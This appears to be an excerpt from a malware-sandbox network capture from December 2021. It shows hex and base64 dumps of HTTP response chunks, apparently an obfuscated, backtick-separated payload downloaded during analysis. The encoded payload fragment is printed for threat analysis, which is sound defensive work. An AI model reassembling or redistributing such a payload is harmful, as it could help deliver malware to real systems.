                                                      Data Ascii: GA2RSxgRUIsYEJGLGBGRSxgRjEsYDZGLGA5MCxgRkUsYDZELGBCRixgQ0YsYDdGLGA5NSxgMzMsYEQ3LGA3RSxgRkMsYDUzLGBGNSxgRUYsYERFLGA3OSxgRjEsYDJGLGBGQyxgNTUsYEQwLGA1MCxgRkYsYEYzLGAzRixgQjQsYDdCLGBENyxgRTMsYEExLGAzRixgMDYsYEQwLGA4QSxgNUYsYEYwLGA5QixgRkUsYEFELGBFOSxgMUYsYEZB
                                                      2021-12-02 17:26:37 UTC15INData Raw: 51 73 59 45 5a 45 4c 47 42 45 52 69 78 67 52 54 41 73 59 45 59 33 4c 47 41 77 4e 69 78 67 51 54 6b 73 59 44 64 46 4c 47 41 34 51 69 78 67 4f 55 59 73 59 45 46 42 4c 47 42 47 52 69 78 67 52 6a 49 73 59 45 4e 46 4c 47 41 34 51 69 78 67 51 6b 59 73 59 44 45 77 4c 47 41 79 52 69 78 67 4d 30 55 73 59 44 4a 42 4c 47 41 33 52 53 78 67 51 55 51 73 59 44 64 47 4c 47 41 79 4f 43 78 67 52 6b 51 73 59 44 52 45 4c 47 41 77 52 53 78 67 51 6b 55 73 59 45 59 7a 4c 47 42 42 51 69 78 67 52 6b 4d 73 59 44 45 33 4c 47 41 33 52 69 78 67 4e 45 59 73 59 44 41 34 4c 47 42 45 4e 69 78 67 52 55 59 73 59 45 59 35 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 45 52 47 4c 47 42 45 51 69 78 67 4e 7a 6b 73 59 45 55 7a 4c 47 41 35 4e 79 78 67 52 6b 59 73 59 44 52 42 4c 47 41 33 51 53 78 67 52
                                                      Data Ascii: QsYEZELGBERixgRTAsYEY3LGAwNixgQTksYDdFLGA4QixgOUYsYEFBLGBGRixgRjIsYENFLGA4QixgQkYsYDEwLGAyRixgM0UsYDJBLGA3RSxgQUQsYDdGLGAyOCxgRkQsYDRELGAwRSxgQkUsYEYzLGBBQixgRkMsYDE3LGA3RixgNEYsYDA4LGBENixgRUYsYEY5LGA1MyxgRjUsYERGLGBEQixgNzksYEUzLGA5NyxgRkYsYDRBLGA3QSxgR
                                                      2021-12-02 17:26:37 UTC16INData Raw: 33 52 69 78 67 4f 44 59 73 59 45 4a 46 4c 47 41 30 51 69 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 43 52 43 78 67 4d 30 59 73 59 45 59 33 4c 47 42 46 52 69 78 67 4e 45 45 73 59 45 56 47 4c 47 42 47 52 53 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 46 4d 43 78 67 4e 30 59 73 59 45 56 44 4c 47 41 34 4d 79 78 67 52 6b 4d 73 59 45 52 45 4c 47 41 33 52 69 78 67 4f 44 4d 73 59 44 56 47 4c 47 41 35 52 69 78 67 4e 7a 6b 73 59 45 59 33 4c 47 41 33 4e 79 78 67 52 6b 59 73 59 45 45 35 4c 47 42 47 51 53 78 67 52 6a 63 73 59 45 55 34 4c 47 41 77 4d 43 78 67 52 6b 4d 73 59 45 51 7a 4c 47 42 46 4f 53 78 67 4d 6a 55 73 59 44 45 79 4c 47 42 43 4e 53 78 67 52 6a 51 73 59 45 45 33 4c 47 41 33 52 69 78 67 52 6a 41 73 59 44 51 33 4c 47 41 7a 52 53 78 67 52 6b 4d 73 59 45 4a 47 4c 47
                                                      Data Ascii: 3RixgODYsYEJFLGA0QixgRkYsYEIzLGBCRCxgM0YsYEY3LGBFRixgNEEsYEVGLGBGRSxgRkQsYEZGLGBFMCxgN0YsYEVDLGA4MyxgRkMsYERELGA3RixgODMsYDVGLGA5RixgNzksYEY3LGA3NyxgRkYsYEE5LGBGQSxgRjcsYEU4LGAwMCxgRkMsYEQzLGBFOSxgMjUsYDEyLGBCNSxgRjQsYEE3LGA3RixgRjAsYDQ3LGAzRSxgRkMsYEJGLG
                                                      2021-12-02 17:26:37 UTC17INData Raw: 59 44 64 47 4c 47 41 33 52 53 78 67 52 6b 45 73 59 44 4d 33 4c 47 42 47 52 43 78 67 4e 44 6b 73 59 44 64 47 4c 47 42 47 4e 79 78 67 4d 30 59 73 59 45 55 33 4c 47 42 43 52 69 78 67 52 6a 51 73 59 44 46 43 4c 47 42 47 52 69 78 67 4d 7a 59 73 59 44 45 34 4c 47 42 46 51 53 78 67 4e 6b 59 73 59 45 5a 44 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 44 4e 47 4c 47 42 45 52 53 78 67 4e 7a 6b 73 59 45 55 31 4c 47 41 78 4e 79 78 67 52 54 41 73 59 44 6b 31 4c 47 42 43 52 69 78 67 52 54 4d 73 59 45 4e 47 4c 47 42 47 52 69 78 67 4d 44 63 73 59 44 64 47 4c 47 42 47 4e 79 78 67 52 6a 51 73 59 44 4d 33 4c 47 42 47 4f 53 78 67 4e 30 49 73 59 45 52 43 4c 47 41 7a 52 69 78 67 51 30 4d 73 59 44 64 47 4c 47 42 46 4e 53 78 67 4e 7a 63 73 59 45 59 35 4c 47 42 47 4e 53 78 67 52 44 4d
                                                      Data Ascii: YDdGLGA3RSxgRkEsYDM3LGBGRCxgNDksYDdGLGBGNyxgM0YsYEU3LGBCRixgRjQsYDFCLGBGRixgMzYsYDE4LGBFQSxgNkYsYEZDLGA1MyxgRjUsYDNGLGBERSxgNzksYEU1LGAxNyxgRTAsYDk1LGBCRixgRTMsYENGLGBGRixgMDcsYDdGLGBGNyxgRjQsYDM3LGBGOSxgN0IsYERCLGAzRixgQ0MsYDdGLGBFNSxgNzcsYEY5LGBGNSxgRDM
                                                      2021-12-02 17:26:37 UTC19INData Raw: 43 78 67 52 54 41 73 59 45 59 78 4c 47 42 42 4e 79 78 67 52 44 49 73 59 44 68 43 4c 47 42 47 4e 53 78 67 52 45 59 73 59 44 46 43 4c 47 41 33 51 79 78 67 52 6a 67 73 59 44 56 43 4c 47 42 47 52 53 78 67 51 54 59 73 59 45 55 35 4c 47 42 45 52 53 78 67 4d 55 59 73 59 45 5a 43 4c 47 41 77 4e 79 78 67 4d 54 59 73 59 44 49 79 4c 47 42 43 4d 79 78 67 51 6b 59 73 59 44 45 35 4c 47 42 43 52 43 78 67 52 6a 59 73 59 44 6c 43 4c 47 42 47 52 53 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4f 55 49 73 59 44 59 31 4c 47 41 77 4e 79 78 67 51 7a 55 73 59 44 4a 47 4c 47 41 31 4d 79 78 67 4f 45 4d 73 59 45 55 33 4c 47 41 35 52 69 78 67 4e 30 59 73 59 45 59 33 4c 47 41 7a 52 53 78 67 4d 7a 41 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4d 55 59 73 59 45 5a 45 4c 47 42 45
                                                      Data Ascii: CxgRTAsYEYxLGBBNyxgRDIsYDhCLGBGNSxgREYsYDFCLGA3QyxgRjgsYDVCLGBGRSxgQTYsYEU5LGBERSxgMUYsYEZCLGAwNyxgMTYsYDIyLGBCMyxgQkYsYDE5LGBCRCxgRjYsYDlCLGBGRSxgRDQsYDZGLGBGRSxgOUIsYDY1LGAwNyxgQzUsYDJGLGA1MyxgOEMsYEU3LGA5RixgN0YsYEY3LGAzRSxgMzAsYEZFLGBCRixgMUYsYEZELGBE
                                                      2021-12-02 17:26:37 UTC20INData Raw: 59 30 4c 47 42 45 4f 53 78 67 4d 30 51 73 59 44 4d 77 4c 47 42 46 51 69 78 67 4e 6b 59 73 59 45 5a 45 4c 47 41 31 4d 79 78 67 52 6a 55 73 59 45 5a 47 4c 47 41 78 4f 43 78 67 4e 7a 51 73 59 44 6b 79 4c 47 41 78 52 43 78 67 52 6b 4d 73 59 45 4d 31 4c 47 41 33 4f 43 78 67 52 6a 55 73 59 45 59 7a 4c 47 42 45 52 69 78 67 52 6a 67 73 59 45 5a 47 4c 47 42 47 51 53 78 67 51 6b 51 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 6a 45 73 59 44 45 33 4c 47 42 47 52 69 78 67 4e 6a 45 73 59 44 68 45 4c 47 42 47 52 69 78 67 52 55 45 73 59 45 56 47 4c 47 41 35 4d 43 78 67 51 6b 55 73 59 45 5a 42 4c 47 42 44 52 43 78 67 52 6b 59 73 59 45 4e 42 4c 47 41 33 52 69 78 67 4d 55 49 73 59 45 45 79 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 5a 44 4c 47 41 31 4e 43 78 67 52 6b 51 73 59
                                                      Data Ascii: Y0LGBEOSxgM0QsYDMwLGBFQixgNkYsYEZELGA1MyxgRjUsYEZGLGAxOCxgNzQsYDkyLGAxRCxgRkMsYEM1LGA3OCxgRjUsYEYzLGBERixgRjgsYEZGLGBGQSxgQkQsYEQyLGA3RixgRjEsYDE3LGBGRixgNjEsYDhELGBGRixgRUEsYEVGLGA5MCxgQkUsYEZBLGBDRCxgRkYsYENBLGA3RixgMUIsYEEyLGBGNyxgM0IsYEZDLGA1NCxgRkQsY
                                                      2021-12-02 17:26:37 UTC21INData Raw: 67 52 45 59 73 59 45 59 33 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 4d 31 4c 47 41 33 52 53 78 67 4f 45 59 73 59 45 52 47 4c 47 41 35 4d 69 78 67 52 45 45 73 59 45 4e 46 4c 47 41 33 52 53 78 67 4f 45 51 73 59 44 56 47 4c 47 42 46 4d 79 78 67 4f 55 59 73 59 44 49 77 4c 47 41 31 4f 43 78 67 4f 45 59 73 59 44 64 47 4c 47 42 45 4e 79 78 67 4e 55 59 73 59 45 55 7a 4c 47 42 45 4e 79 78 67 52 6a 67 73 59 44 56 43 4c 47 41 77 4f 43 78 67 52 55 55 73 59 45 51 35 4c 47 42 44 4e 53 78 67 51 55 59 73 59 45 59 78 4c 47 41 32 51 69 78 67 52 6b 4d 73 59 44 6b 79 4c 47 41 79 4f 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 45 52 53 78 67 52 45 51 73 59 45 45 33 4c 47 42 46 52 69 78 67 4e 30 55 73 59 44 5a 45 4c 47 42 47 51 53 78 67 52 6a 6b 73 59 44 63 33 4c 47 42 46 52 43
                                                      Data Ascii: gREYsYEY3LGBENyxgRjgsYDM1LGA3RSxgOEYsYERGLGA5MixgREEsYENFLGA3RSxgOEQsYDVGLGBFMyxgOUYsYDIwLGA1OCxgOEYsYDdGLGBENyxgNUYsYEUzLGBENyxgRjgsYDVCLGAwOCxgRUUsYEQ5LGBDNSxgQUYsYEYxLGA2QixgRkMsYDkyLGAyOSxgRkQsYDlGLGBERSxgREQsYEE3LGBFRixgN0UsYDZELGBGQSxgRjksYDc3LGBFRC
                                                      2021-12-02 17:26:37 UTC23INData Raw: 4c 47 42 43 52 53 78 67 4e 30 59 73 59 45 56 44 4c 47 41 79 4e 79 78 67 4e 30 55 73 59 44 68 45 4c 47 41 31 52 69 78 67 4e 6a 4d 73 59 44 64 42 4c 47 41 30 51 79 78 67 52 54 6b 73 59 44 42 45 4c 47 42 44 4d 69 78 67 4e 30 49 73 59 44 68 43 4c 47 41 33 52 53 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4e 6b 49 73 59 45 5a 44 4c 47 41 33 4d 53 78 67 4e 7a 63 73 59 45 45 34 4c 47 41 30 52 69 78 67 51 54 49 73 59 45 55 31 4c 47 41 78 52 69 78 67 52 6b 59 73 59 44 6c 43 4c 47 41 31 4d 43 78 67 4e 6b 4d 73 59 45 5a 45 4c 47 41 33 51 69 78 67 52 44 45 73 59 45 52 47 4c 47 42 43 52 69 78 67 52 55 51 73 59 45 46 47 4c 47 42 47 4d 53 78 67 4e 6b 49 73 59 45 5a 44 4c 47 41 7a 4e 69 78 67 52 6a 51 73 59 45 51
                                                      Data Ascii: LGBCRSxgN0YsYEVDLGAyNyxgN0UsYDhELGA1RixgNjMsYDdBLGA0QyxgRTksYDBELGBDMixgN0IsYDhCLGA3RSxgRkUsYDA2LGBCRixgRkIsYEFGLGBGMSxgNkIsYEZDLGA3MSxgNzcsYEE4LGA0RixgQTIsYEU1LGAxRixgRkYsYDlCLGA1MCxgNkMsYEZELGA3QixgRDEsYERGLGBCRixgRUQsYEFGLGBGMSxgNkIsYEZDLGAzNixgRjQsYEQ
                                                      2021-12-02 17:26:37 UTC24INData Raw: 6b 49 73 59 45 5a 44 4c 47 41 78 51 53 78 67 51 6b 59 73 59 45 4e 47 4c 47 41 79 4d 79 78 67 51 54 49 73 59 44 4e 43 4c 47 42 47 4d 53 78 67 51 7a 51 73 59 45 5a 47 4c 47 41 30 4f 43 78 67 51 6a 67 73 59 45 5a 44 4c 47 42 46 4f 53 78 67 4d 44 51 73 59 45 56 47 4c 47 41 35 52 69 78 67 51 54 41 73 59 45 4e 47 4c 47 42 47 52 53 78 67 4e 44 67 73 59 44 5a 42 4c 47 41 35 4d 79 78 67 52 44 41 73 59 44 56 44 4c 47 42 47 52 43 78 67 4d 54 6b 73 59 45 4a 47 4c 47 41 77 4d 79 78 67 51 30 51 73 59 45 52 45 4c 47 41 78 4e 79 78 67 51 7a 51 73 59 44 55 33 4c 47 41 7a 4e 43 78 67 4d 6a 63 73 59 45 5a 47 4c 47 41 77 4f 43 78 67 4e 30 51 73 59 45 59 32 4c 47 41 35 51 69 78 67 52 6b 59 73 59 44 45 32 4c 47 42 43 52 69 78 67 51 7a 59 73 59 45 46 47 4c 47 42 47 4d 53 78 67
                                                      Data Ascii: kIsYEZDLGAxQSxgQkYsYENGLGAyMyxgQTIsYDNCLGBGMSxgQzQsYEZGLGA0OCxgQjgsYEZDLGBFOSxgMDQsYEVGLGA5RixgQTAsYENGLGBGRSxgNDgsYDZBLGA5MyxgRDAsYDVDLGBGRCxgMTksYEJGLGAwMyxgQ0QsYERELGAxNyxgQzQsYDU3LGAzNCxgMjcsYEZGLGAwOCxgN0QsYEY2LGA5QixgRkYsYDE2LGBCRixgQzYsYEFGLGBGMSxg
                                                      2021-12-02 17:26:37 UTC25INData Raw: 42 45 4d 53 78 67 52 55 59 73 59 44 4e 47 4c 47 41 79 4d 53 78 67 51 6b 55 73 59 45 5a 45 4c 47 41 78 4e 79 78 67 4e 6a 6b 73 59 44 68 44 4c 47 41 35 4e 79 78 67 51 7a 51 73 59 44 52 43 4c 47 41 33 52 69 78 67 4d 6b 51 73 59 44 64 45 4c 47 42 47 4e 69 78 67 4d 55 59 73 59 45 4a 46 4c 47 42 47 4f 53 78 67 4d 7a 55 73 59 44 64 46 4c 47 41 34 52 43 78 67 52 6b 59 73 59 44 67 7a 4c 47 41 33 4f 43 78 67 4e 6b 49 73 59 44 52 46 4c 47 41 35 52 69 78 67 52 6b 59 73 59 45 4e 43 4c 47 42 44 4e 43 78 67 4e 7a 63 73 59 45 4a 47 4c 47 41 34 4d 69 78 67 4e 6a 41 73 59 45 5a 47 4c 47 41 31 4e 69 78 67 4d 7a 51 73 59 45 55 32 4c 47 42 47 52 69 78 67 4f 54 45 73 59 44 59 77 4c 47 42 47 52 43 78 67 4f 55 55 73 59 45 59 30 4c 47 42 47 51 69 78 67 4d 6b 59 73 59 44 49 31 4c
                                                      Data Ascii: BEMSxgRUYsYDNGLGAyMSxgQkUsYEZELGAxNyxgNjksYDhDLGA5NyxgQzQsYDRCLGA3RixgMkQsYDdELGBGNixgMUYsYEJFLGBGOSxgMzUsYDdFLGA4RCxgRkYsYDgzLGA3OCxgNkIsYDRFLGA5RixgRkYsYENCLGBDNCxgNzcsYEJGLGA4MixgNjAsYEZGLGA1NixgMzQsYEU2LGBGRixgOTEsYDYwLGBGRCxgOUUsYEY0LGBGQixgMkYsYDI1L
                                                      2021-12-02 17:26:37 UTC27INData Raw: 73 59 45 45 7a 4c 47 41 33 4e 69 78 67 52 44 63 73 59 44 4d 30 4c 47 42 42 52 69 78 67 4e 30 59 73 59 44 4e 47 4c 47 42 43 4e 53 78 67 4d 7a 6b 73 59 44 41 7a 4c 47 42 45 52 69 78 67 4d 54 41 73 59 44 52 46 4c 47 41 33 52 69 78 67 4d 45 45 73 59 45 51 78 4c 47 42 46 4d 43 78 67 4e 55 49 73 59 45 4d 30 4c 47 42 47 52 69 78 67 4d 45 59 73 59 44 67 34 4c 47 41 31 4e 79 78 67 52 6b 59 73 59 44 42 47 4c 47 42 44 4d 69 78 67 52 55 59 73 59 44 42 43 4c 47 42 46 4d 69 78 67 52 45 59 73 59 44 6c 47 4c 47 41 79 4d 43 78 67 52 45 55 73 59 45 5a 42 4c 47 42 46 4e 79 78 67 4f 44 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 45 45 73 59 44 4e 47 4c 47 41 34 4d 43 78 67 4e 7a 67 73 59 44 6b 78 4c 47 41 32 4e 43 78 67 52 55 59 73 59 44 5a 47 4c 47 42 42 4e 79 78 67 52 6a
                                                      Data Ascii: sYEEzLGA3NixgRDcsYDM0LGBBRixgN0YsYDNGLGBCNSxgMzksYDAzLGBERixgMTAsYDRFLGA3RixgMEEsYEQxLGBFMCxgNUIsYEM0LGBGRixgMEYsYDg4LGA1NyxgRkYsYDBGLGBDMixgRUYsYDBCLGBFMixgREYsYDlGLGAyMCxgREUsYEZBLGBFNyxgODgsYEY3LGBGRixgREEsYDNGLGA4MCxgNzgsYDkxLGA2NCxgRUYsYDZGLGBBNyxgRj
                                                      2021-12-02 17:26:37 UTC28INData Raw: 4d 79 78 67 51 7a 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 4d 54 45 73 59 45 4a 45 4c 47 42 42 52 53 78 67 51 54 67 73 59 45 56 45 4c 47 41 32 52 69 78 67 4e 44 6b 73 59 45 49 30 4c 47 42 47 4f 43 78 67 51 54 4d 73 59 45 45 35 4c 47 42 46 52 43 78 67 4e 55 59 73 59 44 51 32 4c 47 41 7a 51 79 78 67 52 6a 63 73 59 44 68 43 4c 47 41 77 4f 43 78 67 51 30 55 73 59 45 4a 47 4c 47 41 30 4e 69 78 67 52 6a 4d 73 59 45 59 35 4c 47 42 42 52 69 78 67 52 44 41 73 59 45 4a 44 4c 47 42 47 52 69 78 67 4d 7a 49 73 59 45 45 79 4c 47 42 46 52 43 78 67 4d 55 59 73 59 44 51 31 4c 47 42 43 51 79 78 67 52 6a 67 73 59 45 56 47 4c 47 41 78 4d 69 78 67 4d 45 51 73 59 45 5a 46 4c 47 41 7a 4e 69 78 67 52 54 49 73 59 45 56 47 4c 47 42 47 52 69 78 67 4f 55 4d 73 59 45 59 77 4c 47 42
                                                      Data Ascii: MyxgQzYsYEZELGBFQixgMTEsYEJELGBBRSxgQTgsYEVELGA2RixgNDksYEI0LGBGOCxgQTMsYEE5LGBFRCxgNUYsYDQ2LGAzQyxgRjcsYDhCLGAwOCxgQ0UsYEJGLGA0NixgRjMsYEY5LGBBRixgRDAsYEJDLGBGRixgMzIsYEEyLGBFRCxgMUYsYDQ1LGBCQyxgRjgsYEVGLGAxMixgMEQsYEZFLGAzNixgRTIsYEVGLGBGRixgOUMsYEYwLGB
                                                      2021-12-02 17:26:37 UTC29INData Raw: 45 5a 44 4c 47 42 44 52 53 78 67 51 6b 59 73 59 45 4d 7a 4c 47 42 45 4d 69 78 67 4d 7a 63 73 59 45 4d 7a 4c 47 41 34 51 69 78 67 52 45 59 73 59 45 5a 44 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 56 45 4c 47 41 33 4e 69 78 67 52 55 49 73 59 45 52 47 4c 47 41 35 51 53 78 67 52 55 4d 73 59 45 56 47 4c 47 41 31 52 69 78 67 52 6a 49 73 59 44 6c 43 4c 47 42 47 52 69 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 47 4f 53 78 67 4f 44 49 73 59 44 4d 79 4c 47 41 34 51 79 78 67 4d 55 51 73 59 44 55 7a 4c 47 42 47 51 79 78 67 51 54 63 73 59 44 49 79 4c 47 41 34 51 79 78 67 52 6b 4d 73 59 44 63 7a 4c 47 41 33 52 69 78 67 4f 55 59 73 59 44 4e 47 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 63 30 4c 47 42 47 52 53 78 67 4d 55 49 73 59 45 5a 44 4c 47 41 32 51 69 78 67 4e 55 59 73
                                                      Data Ascii: EZDLGBDRSxgQkYsYEMzLGBEMixgMzcsYEMzLGA4QixgREYsYEZDLGAzNyxgRkUsYDVELGA3NixgRUIsYERGLGA5QSxgRUMsYEVGLGA1RixgRjIsYDlCLGBGRixgNjYsYEJGLGBGOSxgODIsYDMyLGA4QyxgMUQsYDUzLGBGQyxgQTcsYDIyLGA4QyxgRkMsYDczLGA3RixgOUYsYDNGLGBFQyxgOEIsYDc0LGBGRSxgMUIsYEZDLGA2QixgNUYs
                                                      2021-12-02 17:26:37 UTC31INData Raw: 78 67 4e 6b 59 73 59 44 4d 32 4c 47 42 42 52 69 78 67 4e 30 59 73 59 44 51 79 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 56 45 4c 47 41 35 52 43 78 67 52 44 63 73 59 44 64 47 4c 47 41 77 4d 53 78 67 4e 55 55 73 59 45 5a 47 4c 47 41 32 52 43 78 67 52 6b 55 73 59 45 4a 45 4c 47 42 43 52 69 78 67 52 6a 41 73 59 45 56 47 4c 47 41 30 4f 53 78 67 4f 55 49 73 59 44 4e 47 4c 47 42 47 52 69 78 67 52 45 59 73 59 45 49 35 4c 47 42 47 4e 43 78 67 51 7a 63 73 59 44 4e 45 4c 47 42 42 4d 79 78 67 52 6a 6b 73 59 45 52 42 4c 47 42 43 4d 69 78 67 52 6a 4d 73 59 44 4d 31 4c 47 42 42 4d 79 78 67 51 55 4d 73 59 44 55 79 4c 47 42 46 4e 79 78 67 52 44 55 73 59 45 5a 47 4c 47 41 78 4e 43 78 67 4d 44 45 73 59 45 55 78 4c 47 41 79 52 69 78 67 52 6b 55 73 59 45 55 35 4c 47 42 45 52
                                                      Data Ascii: xgNkYsYDM2LGBBRixgN0YsYDQyLGBBRixgRkYsYEVELGA5RCxgRDcsYDdGLGAwMSxgNUUsYEZGLGA2RCxgRkUsYEJELGBCRixgRjAsYEVGLGA0OSxgOUIsYDNGLGBGRixgREYsYEI5LGBGNCxgQzcsYDNELGBBMyxgRjksYERBLGBCMixgRjMsYDM1LGBBMyxgQUMsYDUyLGBFNyxgRDUsYEZGLGAxNCxgMDEsYEUxLGAyRixgRkUsYEU5LGBER
                                                      2021-12-02 17:26:37 UTC32INData Raw: 7a 4c 47 42 44 52 53 78 67 4f 55 49 73 59 44 64 47 4c 47 41 77 51 69 78 67 52 45 55 73 59 45 5a 44 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 49 7a 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 59 79 4c 47 42 45 4e 79 78 67 4e 30 4d 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 51 79 78 67 4e 44 4d 73 59 44 67 35 4c 47 42 45 4e 69 78 67 4f 55 59 73 59 45 51 33 4c 47 42 43 52 69 78 67 51 6b 59 73 59 45 4a 46 4c 47 42 47 51 53 78 67 4f 44 63 73 59 44 55 79 4c 47 41 34 4d 69 78 67 51 54 67 73 59 45 59 7a 4c 47 42 46 51 53 78 67 4d 54 55 73 59 44 56 46 4c 47 42 47 52 43 78 67 4d 7a 55 73 59 45 5a 47 4c 47 42 45 4f 53 78 67 4f 54 63 73 59 45 59 33 4c 47 42 45 4d 69 78 67 51 6b 59 73 59 45
                                                      Data Ascii: zLGBDRSxgOUIsYDdGLGAwQixgREUsYEZDLGA1QixgRkUsYDgzLGBFRixgRkUsYDIzLGBFOSxgNUYsYEYyLGBENyxgN0MsYEZCLGBCNyxgRjQsYERGLGBGQyxgNDMsYDg5LGBENixgOUYsYEQ3LGBCRixgQkYsYEJFLGBGQSxgODcsYDUyLGA4MixgQTgsYEYzLGBFQSxgMTUsYDVFLGBGRCxgMzUsYEZGLGBEOSxgOTcsYEY3LGBEMixgQkYsYE
                                                      2021-12-02 17:26:37 UTC33INData Raw: 52 6b 59 73 59 45 4d 7a 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 44 52 47 4c 47 41 77 52 53 78 67 4e 7a 41 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 4f 44 67 73 59 45 49 7a 4c 47 41 33 52 53 78 67 4f 54 63 73 59 45 52 47 4c 47 42 45 51 53 78 67 52 6a 45 73 59 45 4d 32 4c 47 41 35 52 69 78 67 4e 44 41 73 59 44 4d 34 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 4a 47 4c 47 41 30 4d 53 78 67 52 6a 67 73 59 45 5a 42 4c 47 42 43 52 69 78 67 4f 44 51 73 59 44 63 34 4c 47 42 47 4e 53 78 67 4d 7a 63 73 59 44 55 35 4c 47 41 33 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 56 43 4c 47 41 33 52 69 78 67 52 6b 4d 73 59 45 49 78 4c 47 42 43 52 69 78 67 4d 44 51 73 59 45 59 78 4c 47 41 33 52 69 78 67 52 6b 51 73 59 44 49 32 4c 47 42 43 52 69 78
                                                      Data Ascii: RkYsYEMzLGA3RixgRkMsYDRGLGAwRSxgNzAsYEZFLGAxMyxgODgsYEIzLGA3RSxgOTcsYERGLGBEQSxgRjEsYEM2LGA5RixgNDAsYDM4LGBGRixgREEsYEJGLGA0MSxgRjgsYEZBLGBCRixgODQsYDc4LGBGNSxgMzcsYDU5LGA3RixgRjQsYDdGLGBBNixgQkYsYEVCLGA3RixgRkMsYEIxLGBCRixgMDQsYEYxLGA3RixgRkQsYDI2LGBCRix
                                                      2021-12-02 17:26:37 UTC34INData Raw: 47 42 45 52 69 78 67 4f 54 63 73 59 44 56 46 4c 47 42 47 52 69 78 67 4f 55 49 73 59 44 4e 43 4c 47 42 42 52 69 78 67 52 6b 59 73 59 44 5a 46 4c 47 41 33 4f 43 78 67 52 6b 51 73 59 45 4a 47 4c 47 42 47 51 53 78 67 51 55 51 73 59 44 64 47 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 44 4a 42 4c 47 41 33 52 43 78 67 4d 7a 63 73 59 45 5a 47 4c 47 41 34 52 43 78 67 52 6b 4d 73 59 44 41 30 4c 47 42 46 52 69 78 67 52 6b 59 73 59 45 59 31 4c 47 41 35 51 69 78 67 52 6b 4d 73 59 45 45 78 4c 47 41 79 4d 43 78 67 4f 54 6b 73 59 45 51 33 4c 47 42 47 51 69 78 67 4d 55 59 73 59 44 52 42 4c 47 42 42 52 69 78 67 52 6b 59 73 59 45 51 7a 4c 47 41 35 52 43 78 67 52 44 63 73 59 45 5a 47 4c 47 41 33 4d 79 78 67 51 7a 51 73 59 44 6c 43 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 46 47
                                                      Data Ascii: GBERixgOTcsYDVFLGBGRixgOUIsYDNCLGBBRixgRkYsYDZFLGA3OCxgRkQsYEJGLGBGQSxgQUQsYDdGLGBBNyxgRkYsYDJBLGA3RCxgMzcsYEZGLGA4RCxgRkMsYDA0LGBFRixgRkYsYEY1LGA5QixgRkMsYEExLGAyMCxgOTksYEQ3LGBGQixgMUYsYDRBLGBBRixgRkYsYEQzLGA5RCxgRDcsYEZGLGA3MyxgQzQsYDlCLGBGRixgRkEsYDFG
                                                      2021-12-02 17:26:37 UTC36INData Raw: 51 73 59 45 51 78 4c 47 42 46 4f 53 78 67 4e 55 59 73 59 45 5a 47 4c 47 41 7a 4e 79 78 67 52 6b 51 73 59 44 49 78 4c 47 41 33 52 69 78 67 4f 45 4d 73 59 45 5a 47 4c 47 42 46 51 53 78 67 4d 44 55 73 59 45 4a 45 4c 47 42 47 51 53 78 67 4f 44 6b 73 59 44 55 78 4c 47 42 47 4f 43 78 67 51 6b 59 73 59 45 59 35 4c 47 41 77 4e 53 78 67 4d 6b 51 73 59 45 56 43 4c 47 41 33 4e 53 78 67 4e 55 55 73 59 44 64 45 4c 47 41 34 51 79 78 67 4e 54 63 73 59 44 64 47 4c 47 42 42 52 43 78 67 52 54 59 73 59 45 4e 47 4c 47 42 47 4f 53 78 67 4f 55 59 73 59 45 51 7a 4c 47 42 46 52 69 78 67 52 6b 51 73 59 45 51 32 4c 47 42 47 52 69 78 67 52 45 45 73 59 45 59 33 4c 47 42 47 51 79 78 67 4e 54 63 73 59 44 52 47 4c 47 42 46 4f 53 78 67 52 44 55 73 59 44 46 47 4c 47 42 42 51 69 78 67 52
                                                      Data Ascii: QsYEQxLGBFOSxgNUYsYEZGLGAzNyxgRkQsYDIxLGA3RixgOEMsYEZGLGBFQSxgMDUsYEJELGBGQSxgODksYDUxLGBGOCxgQkYsYEY5LGAwNSxgMkQsYEVCLGA3NSxgNUUsYDdELGA4QyxgNTcsYDdGLGBBRCxgRTYsYENGLGBGOSxgOUYsYEQzLGBFRixgRkQsYEQ2LGBGRixgREEsYEY3LGBGQyxgNTcsYDRGLGBFOSxgRDUsYDFGLGBBQixgR
